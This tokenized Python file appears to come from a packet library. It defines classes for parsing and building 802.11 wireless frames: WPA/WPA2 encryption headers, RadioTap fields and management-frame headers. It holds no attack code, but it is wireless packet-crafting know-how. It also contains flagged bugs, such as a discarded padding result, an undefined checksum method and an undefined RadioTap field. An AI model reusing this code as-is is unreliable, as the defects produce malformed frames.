set_byte ( <NUM_LIT:1> , nb ) <EOL> # TKIP sequence counter ( TSC ) bytes and flags : TSC0 in byte 2 , extIV in byte 3 , TSC2-TSC5 in bytes 4-7 <EOL> def get_TSC0 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:2> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC0 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:2> , nb ) <EOL> def get_extIV ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:5> ) & <NUM_LIT> ) <EOL> def set_extIV ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:5> ) <EOL> self . header . set_byte ( <NUM_LIT:3> , nb ) <EOL> def get_TSC2 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:4> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC2 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:4> , nb ) <EOL> def get_TSC3 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:5> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC3 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:5> , nb ) <EOL> def get_TSC4 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:6> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC4 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:6> , nb ) <EOL> def get_TSC5 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:7> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_TSC5 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . 
set_byte ( <NUM_LIT:7> , nb ) <EOL> # WPA data : body followed by a 12-byte tail = 8-byte MIC plus 4-byte ICV <EOL> class Dot11WPAData ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:0> <EOL> tail_size = <NUM_LIT:12> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_icv ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . tail . get_long ( - <NUM_LIT:4> , "<STR_LIT:>>" ) <EOL> return b <EOL> # NOTE ( review ) : compute_checksum is not defined in this class -- presumably inherited or resolved elsewhere ; confirm <EOL> def set_icv ( self , value = None ) : <EOL> "<STR_LIT>" <EOL> if value is None : <EOL> value = self . compute_checksum ( self . body_string ) <EOL> nb = value & <NUM_LIT> <EOL> self . tail . set_long ( - <NUM_LIT:4> , nb ) <EOL> def get_MIC ( self ) : <EOL> '<STR_LIT>' <EOL> return self . get_tail_as_string ( ) [ : <NUM_LIT:8> ] <EOL> # NOTE ( review ) : the ljust result below is discarded ( str . ljust returns a new string ) , so short values are never actually padded <EOL> def set_MIC ( self , value ) : <EOL> '<STR_LIT>' <EOL> value . ljust ( <NUM_LIT:8> , '<STR_LIT:\x00>' ) <EOL> value = value [ : <NUM_LIT:8> ] <EOL> icv = self . tail . get_buffer_as_string ( ) [ - <NUM_LIT:4> : ] <EOL> self . tail . set_bytes_from_string ( value + icv ) <EOL> # WPA2 ( CCMP ) header : 8 bytes holding the packet number , key id and extIV flag <EOL> class Dot11WPA2 ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:8> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> # Heuristic : the TKIP-style seed relation must NOT hold , and extIV must be set <EOL> def is_WPA2 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . get_PN1 ( ) == ( ( self . get_PN0 ( ) | <NUM_LIT> ) & <NUM_LIT> ) <EOL> return ( not b and self . get_extIV ( ) ) <EOL> def get_extIV ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:5> ) & <NUM_LIT> ) <EOL> def set_extIV ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:5> ) <EOL> self . header . 
set_byte ( <NUM_LIT:3> , nb ) <EOL> def get_keyid ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:3> ) <EOL> return ( ( b >> <NUM_LIT:6> ) & <NUM_LIT> ) <EOL> def set_keyid ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:3> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:6> ) <EOL> self . header . set_byte ( <NUM_LIT:3> , nb ) <EOL> def get_decrypted_data ( self ) : <EOL> '<STR_LIT>' <EOL> return self . body_string <EOL> # CCMP packet number ( PN ) bytes : PN0 / PN1 in header bytes 0-1 , PN2-PN5 in bytes 4-7 <EOL> def get_PN0 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN0 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> def get_PN1 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN1 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_PN2 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:4> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN2 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:4> , nb ) <EOL> def get_PN3 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:5> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN3 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:5> , nb ) <EOL> def get_PN4 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:6> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN4 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:6> , nb ) <EOL> def get_PN5 ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . 
get_byte ( <NUM_LIT:7> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_PN5 ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:7> , nb ) <EOL> # WPA2 data : body followed by an 8-byte MIC tail ( no separate ICV , unlike Dot11WPAData ) <EOL> class Dot11WPA2Data ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:0> <EOL> tail_size = <NUM_LIT:8> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_MIC ( self ) : <EOL> '<STR_LIT>' <EOL> return self . get_tail_as_string ( ) <EOL> # NOTE ( review ) : the ljust result below is discarded ( str . ljust returns a new string ) , so short values are never actually padded <EOL> def set_MIC ( self , value ) : <EOL> '<STR_LIT>' <EOL> value . ljust ( <NUM_LIT:8> , '<STR_LIT:\x00>' ) <EOL> value = value [ : <NUM_LIT:8> ] <EOL> self . tail . set_bytes_from_string ( value ) <EOL> class RadioTap ( ProtocolPacket ) : <EOL> __HEADER_BASE_SIZE = <NUM_LIT:8> <EOL> _PRESENT_FLAGS_SIZE = <NUM_LIT:4> <EOL> _BASE_PRESENT_FLAGS_OFFSET = <NUM_LIT:4> <EOL> class __RadioTapField ( object ) : <EOL> ALIGNMENT = <NUM_LIT:1> <EOL> def __str__ ( self ) : <EOL> return str ( self . __class__ . 
__name__ ) <EOL> class RTF_TSFT ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:0> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:8> <EOL> class RTF_FLAGS ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:1> <EOL> STRUCTURE = "<STR_LIT>" <EOL> PROPERTY_CFP = <NUM_LIT> <EOL> PROPERTY_SHORTPREAMBLE = <NUM_LIT> <EOL> PROPERTY_WEP = <NUM_LIT> <EOL> PROPERTY_FRAGMENTATION = <NUM_LIT> <EOL> PROPERTY_FCS_AT_END = <NUM_LIT> <EOL> PROPERTY_PAYLOAD_PADDING = <NUM_LIT> <EOL> PROPERTY_BAD_FCS = <NUM_LIT> <EOL> PROPERTY_SHORT_GI = <NUM_LIT> <EOL> class RTF_RATE ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:2> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_CHANNEL ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:3> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_FHSS ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:4> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_DBM_ANTSIGNAL ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:5> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_DBM_ANTNOISE ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:6> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_LOCK_QUALITY ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:7> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_TX_ATTENUATION ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:8> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_DB_TX_ATTENUATION ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:9> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_DBM_TX_POWER ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:10> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_ANTENNA ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:11> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_DB_ANTSIGNAL ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:12> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_DB_ANTNOISE ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> 
STRUCTURE = "<STR_LIT>" <EOL> class RTF_FCS_IN_HEADER ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:4> <EOL> class RTF_TX_FLAGS ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:15> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_RTS_RETRIES ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:16> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_DATA_RETRIES ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_XCHANNEL ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:4> <EOL> class RTF_EXT ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> STRUCTURE = [ ] <EOL> radiotap_fields = __RadioTapField . __subclasses__ ( ) <EOL> radiotap_fields . sort ( lambda x , y : cmp ( x . BIT_NUMBER , y . BIT_NUMBER ) ) <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> if aBuffer : <EOL> length = struct . unpack ( '<STR_LIT>' , aBuffer [ <NUM_LIT:2> : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> header_size = length <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> self . load_packet ( aBuffer ) <EOL> else : <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> self . set_version ( <NUM_LIT:0> ) <EOL> self . __set_present ( <NUM_LIT> ) <EOL> def get_header_length ( self ) : <EOL> '<STR_LIT>' <EOL> self . __update_header_length ( ) <EOL> return self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> def get_version ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return b <EOL> def set_version ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . 
set_byte ( <NUM_LIT:0> , nb ) <EOL> nb = ( value & <NUM_LIT> ) <EOL> def get_present ( self , offset = _BASE_PRESENT_FLAGS_OFFSET ) : <EOL> "<STR_LIT>" <EOL> present = self . header . get_long ( offset , "<STR_LIT:<>" ) <EOL> return present <EOL> def __set_present ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . set_long ( <NUM_LIT:4> , value ) <EOL> def get_present_bit ( self , field , offset = <NUM_LIT:4> ) : <EOL> '<STR_LIT>' <EOL> present = self . get_present ( offset ) <EOL> return not not ( <NUM_LIT:2> ** field . BIT_NUMBER & present ) <EOL> def __set_present_bit ( self , field ) : <EOL> '<STR_LIT>' <EOL> npresent = <NUM_LIT:2> ** field . BIT_NUMBER | self . get_present ( ) <EOL> self . header . set_long ( <NUM_LIT:4> , npresent , '<STR_LIT:<>' ) <EOL> def __unset_present_bit ( self , field ) : <EOL> '<STR_LIT>' <EOL> npresent = ~ ( <NUM_LIT:2> ** field . BIT_NUMBER ) & self . get_present ( ) <EOL> self . header . set_long ( <NUM_LIT:4> , npresent , '<STR_LIT:<>' ) <EOL> def __align ( self , val , align ) : <EOL> return ( ( ( ( val ) + ( ( align ) - <NUM_LIT:1> ) ) & ~ ( ( align ) - <NUM_LIT:1> ) ) - val ) <EOL> def __get_field_position ( self , field ) : <EOL> offset = RadioTap . _BASE_PRESENT_FLAGS_OFFSET <EOL> extra_present_flags_count = <NUM_LIT:0> <EOL> while self . get_present_bit ( RadioTap . RTF_EXT , offset ) : <EOL> offset += RadioTap . _PRESENT_FLAGS_SIZE <EOL> extra_present_flags_count += <NUM_LIT:1> <EOL> field_position = self . __HEADER_BASE_SIZE + ( RadioTap . _BASE_PRESENT_FLAGS_OFFSET * extra_present_flags_count ) <EOL> for f in self . radiotap_fields : <EOL> field_position += self . __align ( field_position , f . ALIGNMENT ) <EOL> if f == field : <EOL> return field_position <EOL> if self . get_present_bit ( f ) : <EOL> total_length = struct . calcsize ( f . STRUCTURE ) <EOL> field_position += total_length <EOL> return None <EOL> def unset_field ( self , field ) : <EOL> is_present = self . 
get_present_bit ( field ) <EOL> if is_present is False : <EOL> return False <EOL> byte_pos = self . __get_field_position ( field ) <EOL> if not byte_pos : <EOL> return False <EOL> self . __unset_present_bit ( field ) <EOL> header = self . get_header_as_string ( ) <EOL> total_length = struct . calcsize ( field . STRUCTURE ) <EOL> header = header [ : byte_pos ] + header [ byte_pos + total_length : ] <EOL> self . load_header ( header ) <EOL> def __get_field_values ( self , field ) : <EOL> is_present = self . get_present_bit ( field ) <EOL> if is_present is False : <EOL> return None <EOL> byte_pos = self . __get_field_position ( field ) <EOL> header = self . get_header_as_string ( ) <EOL> total_length = struct . calcsize ( field . STRUCTURE ) <EOL> v = header [ byte_pos : byte_pos + total_length ] <EOL> field_values = struct . unpack ( field . STRUCTURE , v ) <EOL> return field_values <EOL> def __set_field_values ( self , field , values ) : <EOL> if not hasattr ( values , '<STR_LIT>' ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> num_fields = len ( field . STRUCTURE . translate ( string . maketrans ( "<STR_LIT>" , "<STR_LIT>" ) , '<STR_LIT>' ) ) <EOL> if len ( values ) != num_fields : <EOL> raise Exception ( "<STR_LIT>" % ( str ( field ) , struct . calcsize ( field . STRUCTURE ) ) ) <EOL> is_present = self . get_present_bit ( field ) <EOL> if is_present is False : <EOL> self . __set_present_bit ( field ) <EOL> byte_pos = self . __get_field_position ( field ) <EOL> header = self . get_header_as_string ( ) <EOL> total_length = struct . calcsize ( field . STRUCTURE ) <EOL> v = header [ byte_pos : byte_pos + total_length ] <EOL> new_str = struct . pack ( field . STRUCTURE , * values ) <EOL> if is_present is True : <EOL> header = header [ : byte_pos ] + new_str + header [ byte_pos + total_length : ] <EOL> else : <EOL> header = header [ : byte_pos ] + new_str + header [ byte_pos : ] <EOL> self . 
load_header ( header ) <EOL> def set_tsft ( self , nvalue ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( RadioTap . RTF_TSFT , [ nvalue ] ) <EOL> def get_tsft ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( RadioTap . RTF_TSFT ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_flags ( self , nvalue ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_FLAGS , [ nvalue ] ) <EOL> def get_flags ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_FLAGS ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_rate ( self , nvalue ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_RATE , [ nvalue ] ) <EOL> def get_rate ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_RATE ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_channel ( self , freq , flags ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_CHANNEL , [ freq , flags ] ) <EOL> def get_channel ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_CHANNEL ) <EOL> return values <EOL> def set_FHSS ( self , hop_set , hop_pattern ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_FHSS , [ hop_set , hop_pattern ] ) <EOL> def get_FHSS ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_FHSS ) <EOL> return values <EOL> def set_dBm_ant_signal ( self , signal ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DBM_ANTSIGNAL , [ signal ] ) <EOL> def get_dBm_ant_signal ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . 
RTF_DBM_ANTSIGNAL ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dBm_ant_noise ( self , signal ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DBM_ANTNOISE , [ signal ] ) <EOL> def get_dBm_ant_noise ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DBM_ANTNOISE ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_lock_quality ( self , quality ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_LOCK_QUALITY , [ quality ] ) <EOL> def get_lock_quality ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_LOCK_QUALITY ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_tx_attenuation ( self , power ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_TX_ATTENUATION , [ power ] ) <EOL> def get_tx_attenuation ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_TX_ATTENUATION ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dB_tx_attenuation ( self , power ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DB_TX_ATTENUATION , [ power ] ) <EOL> def get_dB_tx_attenuation ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DB_TX_ATTENUATION ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dBm_tx_power ( self , power ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DBM_TX_POWER , [ power ] ) <EOL> def get_dBm_tx_power ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . 
RTF_DBM_TX_POWER ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_antenna ( self , antenna_index ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_ANTENNA , [ antenna_index ] ) <EOL> def get_antenna ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_ANTENNA ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dB_ant_signal ( self , signal ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DB_ANTSIGNAL , [ signal ] ) <EOL> def get_dB_ant_signal ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DB_ANTSIGNAL ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dB_ant_noise ( self , signal ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DB_ANTNOISE , [ signal ] ) <EOL> def get_dB_ant_noise ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DB_ANTNOISE ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_FCS_in_header ( self , fcs ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_FCS_IN_HEADER , [ fcs ] ) <EOL> def get_FCS_in_header ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_FCS_IN_HEADER ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_RTS_retries ( self , retries ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_RTS_RETRIES , [ retries ] ) <EOL> def get_RTS_retries ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_RTS_RETRIES ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_tx_flags ( self , flags ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . 
RTF_TX_FLAGS , [ flags ] ) <EOL> def get_tx_flags ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_TX_FLAGS ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_xchannel ( self , flags , freq , channel , maxpower ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_XCHANNEL , [ flags , freq , channel , maxpower ] ) <EOL> def get_xchannel ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( field = self . RTF_XCHANNEL ) <EOL> return values <EOL> def set_data_retries ( self , retries ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DATA_RETRIES , [ retries ] ) <EOL> def get_data_retries ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DATA_RETRIES ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_hardware_queue ( self , queue ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_HARDWARE_QUEUE , [ queue ] ) <EOL> def __update_header_length ( self ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:2> , self . get_header_size ( ) , "<STR_LIT:<>" ) <EOL> def get_packet ( self ) : <EOL> self . __update_header_length ( ) <EOL> return ProtocolPacket . get_packet ( self ) <EOL> class Dot11ManagementFrame ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . 
get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_destination_address ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_destination_address ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_source_address ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_source_address ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> def get_bssid ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT> : <NUM_LIT:20> ] <EOL> def set_bssid ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT> + i , value [ i ] ) <EOL> def get_sequence_control ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_sequence_control ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_fragment_number ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . get_sequence_control ( ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_fragment_number ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) & mask <EOL> nb = masked | ( value & <NUM_LIT> ) <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_sequence_number ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . 
